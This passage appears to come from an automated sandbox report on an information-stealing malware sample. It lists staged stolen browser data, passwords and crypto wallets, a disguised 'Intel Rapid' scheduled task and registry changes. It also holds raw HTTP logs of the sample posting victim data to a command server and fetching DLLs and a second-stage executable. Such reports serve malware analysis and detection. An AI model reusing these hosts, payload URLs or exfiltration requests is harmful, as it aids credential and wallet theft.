  727. "C:\\Windows\\sysnative\\Tasks\\Intel Rapid",
  728. "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
  729. "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
  730. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
  731. "\\??\\WMIDataDevice",
  732. "\\??\\PIPE\\samr",
  733. "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
  734. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
  735. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
  736. "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
  737. "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
  738. "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
  739. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
  740. "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM"
  741.  
  742.  
  743. * Deleted Files:
  744. "C:\\ProgramData\\freebl3.dll",
  745. "C:\\ProgramData\\mozglue.dll",
  746. "C:\\ProgramData\\msvcp140.dll",
  747. "C:\\ProgramData\\nss3.dll",
  748. "C:\\ProgramData\\softokn3.dll",
  749. "C:\\ProgramData\\vcruntime140.dll",
  750. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Autofill\\Google Chrome_Default.txt",
  751. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Autofill",
  752. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\CC\\Google Chrome_Default.txt",
  753. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\CC",
  754. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies\\Edge_Cookies.txt",
  755. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies\\Google Chrome_Default.txt",
  756. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies\\IE_Cookies.txt",
  757. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Cookies",
  758. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\cookie_list.txt",
  759. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Downloads\\Google Chrome_Default.txt",
  760. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Downloads",
  761. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Files\\Files.zip",
  762. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Files\\Files3.zip",
  763. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Files",
  764. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\History\\Google Chrome_Default.txt",
  765. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\History",
  766. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\information.txt",
  767. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\outlook.txt",
  768. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\passwords.txt",
  769. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Soft\\Authy",
  770. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Soft",
  771. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Anoncoin",
  772. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\BBQCoin",
  773. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Bitcoin",
  774. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DashCore",
  775. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DevCoin",
  776. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\DigitalCoin",
  777. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\ElectronCash",
  778. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Electrum",
  779. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\ElectrumLTC",
  780. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Ethereum",
  781. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Exodus",
  782. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\FlorinCoin",
  783. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Franko",
  784. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\FreiCoin",
  785. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\GoldCoinGLD",
  786. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\InfiniteCoin",
  787. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\IOCoin",
  788. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\IxCoin",
  789. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\JAXX",
  790. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Litecoin",
  791. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MegaCoin",
  792. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MinCoin",
  793. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\MultiDoge",
  794. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\NameCoin",
  795. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\PrimeCoin",
  796. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\TerraCoin",
  797. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\YACoin",
  798. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets\\Zcash",
  799. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\files\\Wallets",
  800. "C:\\ProgramData\\4Z5AKEBYKLK5WYOCEWV2JQR2I\\US_00000000-0000-0000-0000-0000000000006747247925.zip",
  801. "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_8874219db6846885b78323d8de8249d1.exe",
  802. "C:\\Windows\\Tasks\\Intel Rapid.job",
  803. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
  804.  
  805.  
  806. * Modified Registry Keys:
  807. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
  808. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4162F30D-5B2A-4A6C-8437-716EB3FBAE8B\\Path",
  809. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4162F30D-5B2A-4A6C-8437-716EB3FBAE8B\\Hash",
  810. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Intel Rapid\\Id",
  811. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tree\\Intel Rapid\\Index",
  812. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4162F30D-5B2A-4A6C-8437-716EB3FBAE8B\\Triggers",
  813. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks\\4162F30D-5B2A-4A6C-8437-716EB3FBAE8B\\DynamicInfo",
  814. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ProcessID",
  815. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ThrottleDrege",
  816. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Parameters\\ServiceDllUnloadOnStop",
  817. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\LastServiceStart",
  818. "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Wbem\\Transports\\Decoupled\\Server",
  819. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\CreationTime",
  820. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\MarshaledProxy",
  821. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\Transports\\Decoupled\\Server\\ProcessIdentifier",
  822. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\ConfigValueEssNeedsLoading",
  823. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\CIMOM\\List of event-active namespaces",
  824. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\WBEM\\ESS\\//./root/CIMV2\\SCM Event Provider"
  825.  
  826.  
  827. * Deleted Registry Keys:
  828. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\Intel Rapid.job",
  829. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\CompatibilityAdapter\\Signatures\\Intel Rapid.job.fp"
  830.  
  831.  
  832. * DNS Communications:
  833.  
  834. "type": "A",
  835. "request": "earphorialofts.net",
  836. "answers":
  837.  
  838. "data": "185.99.133.219",
  839. "type": "A"
  840.  
  841.  
  842.  
  843.  
  844. "type": "A",
  845. "request": "ip-api.com",
  846. "answers":
  847.  
  848. "data": "72.11.140.50",
  849. "type": "A"
  850.  
  851.  
  852. "data": "66.212.29.250",
  853. "type": "A"
  854.  
  855.  
  856.  
  857.  
  858. "type": "A",
  859. "request": "neecopower.com",
  860. "answers":
  861.  
  862. "data": "66.165.234.34",
  863. "type": "A"
  864.  
  865.  
  866.  
  867.  
  868.  
  869. * Domains:
  870.  
  871. "ip": "66.165.234.34",
  872. "domain": "neecopower.com"
  873.  
  874.  
  875. "ip": "185.99.133.219",
  876. "domain": "earphorialofts.net"
  877.  
  878.  
  879. "ip": "66.212.29.250",
  880. "domain": "ip-api.com"
  881.  
  882.  
  883.  
  884. * Network Communication - ICMP:
  885.  
  886. * Network Communication - HTTP:
  887.  
  888. "count": 1,
  889. "body": "--1BEF0A57BE110FD467A--\r\n",
  890. "uri": "http://earphorialofts.net/72",
  891. "user-agent": "",
  892. "method": "POST",
  893. "host": "earphorialofts.net",
  894. "version": "1.1",
  895. "path": "/72",
  896. "data": "POST /72 HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: earphorialofts.net\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  897. "port": 80
  898.  
  899.  
  900. "count": 1,
  901. "body": "",
  902. "uri": "http://earphorialofts.net/freebl3.dll",
  903. "user-agent": "",
  904. "method": "GET",
  905. "host": "earphorialofts.net",
  906. "version": "1.1",
  907. "path": "/freebl3.dll",
  908. "data": "GET /freebl3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: earphorialofts.net\r\nConnection: Keep-Alive\r\n\r\n",
  909. "port": 80
  910.  
  911.  
  912. "count": 1,
  913. "body": "",
  914. "uri": "http://earphorialofts.net/mozglue.dll",
  915. "user-agent": "",
  916. "method": "GET",
  917. "host": "earphorialofts.net",
  918. "version": "1.1",
  919. "path": "/mozglue.dll",
  920. "data": "GET /mozglue.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: earphorialofts.net\r\nConnection: Keep-Alive\r\n\r\n",
  921. "port": 80
  922.  
  923.  
  924. "count": 2,
  925. "body": "",
  926. "uri": "http://earphorialofts.net/msvcp140.dll",
  927. "user-agent": "",
  928. "method": "GET",
  929. "host": "earphorialofts.net",
  930. "version": "1.1",
  931. "path": "/msvcp140.dll",
  932. "data": "GET /msvcp140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: earphorialofts.net\r\nConnection: Keep-Alive\r\n\r\n",
  933. "port": 80
  934.  
  935.  
  936. "count": 1,
  937. "body": "",
  938. "uri": "http://earphorialofts.net/nss3.dll",
  939. "user-agent": "",
  940. "method": "GET",
  941. "host": "earphorialofts.net",
  942. "version": "1.1",
  943. "path": "/nss3.dll",
  944. "data": "GET /nss3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: earphorialofts.net\r\nConnection: Keep-Alive\r\n\r\n",
  945. "port": 80
  946.  
  947.  
  948. "count": 1,
  949. "body": "",
  950. "uri": "http://earphorialofts.net/softokn3.dll",
  951. "user-agent": "",
  952. "method": "GET",
  953. "host": "earphorialofts.net",
  954. "version": "1.1",
  955. "path": "/softokn3.dll",
  956. "data": "GET /softokn3.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: earphorialofts.net\r\nConnection: Keep-Alive\r\n\r\n",
  957. "port": 80
  958.  
  959.  
  960. "count": 1,
  961. "body": "",
  962. "uri": "http://earphorialofts.net/vcruntime140.dll",
  963. "user-agent": "",
  964. "method": "GET",
  965. "host": "earphorialofts.net",
  966. "version": "1.1",
  967. "path": "/vcruntime140.dll",
  968. "data": "GET /vcruntime140.dll HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: earphorialofts.net\r\nConnection: Keep-Alive\r\n\r\n",
  969. "port": 80
  970.  
  971.  
  972. "count": 2,
  973. "body": "--1BEF0A57BE110FD467A--\r\n",
  974. "uri": "http://ip-api.com/line/",
  975. "user-agent": "",
  976. "method": "POST",
  977. "host": "ip-api.com",
  978. "version": "1.1",
  979. "path": "/line/",
  980. "data": "POST /line/ HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 25\r\nHost: ip-api.com\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A--\r\n",
  981. "port": 80
  982.  
  983.  
  984. "count": 1,
  985. "body": "",
  986. "uri": "http://earphorialofts.net/",
  987. "user-agent": "",
  988. "method": "POST",
  989. "host": "earphorialofts.net",
  990. "version": "1.1",
  991. "path": "/",
  992. "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 5111\r\nHost: earphorialofts.net\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n",
  993. "port": 80
  994.  
  995.  
  996. "count": 2,
  997. "body": "",
  998. "uri": "http://earphorialofts.net/",
  999. "user-agent": "",
  1000. "method": "POST",
  1001. "host": "earphorialofts.net",
  1002. "version": "1.1",
  1003. "path": "/",
  1004. "data": "POST / HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nContent-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A\r\nContent-Length: 5111\r\nHost: earphorialofts.net\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"hwid\"\r\n\r\n00000000-0000-0000-0000-000000000000\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"os\"\r\n\r\nWindows 7 Enterprise N\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"platform\"\r\n\r\nx64\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"profile\"\r\n\r\n72\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"user\"\r\n\r\nuser\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"cccount\"\r\n\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"fcount\"\r\n\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"telegram\"\r\n\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"ver\"\r\n\r\n12.1\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"ccount\"\r\n\r\n0\r\n--1BEF0A57BE110FD467A\r\nContent-Disposition: form-data; name=\"logs\"; filename=\"US_c1515a12-",
  1005. "port": 80
  1006.  
  1007.  
  1008. "count": 2,
  1009. "body": "",
  1010. "uri": "http://neecopower.com/wp-content/uploads/2019/08/client_only_64.exe",
  1011. "user-agent": "",
  1012. "method": "GET",
  1013. "host": "neecopower.com",
  1014. "version": "1.1",
  1015. "path": "/wp-content/uploads/2019/08/client_only_64.exe",
  1016. "data": "GET /wp-content/uploads/2019/08/client_only_64.exe HTTP/1.1\r\nAccept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\nAccept-Language: ru-RU,ru;q=0.9,en;q=0.8\r\nAccept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\nAccept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\nHost: neecopower.com\r\nConnection: Keep-Alive\r\n\r\n",
  1017. "port": 80
  1018.  
  1019.  
  1020.  
  1021. * Network Communication - SMTP:
  1022.  
  1023. * Network Communication - Hosts:
  1024.  
  1025. * Network Communication - IRC: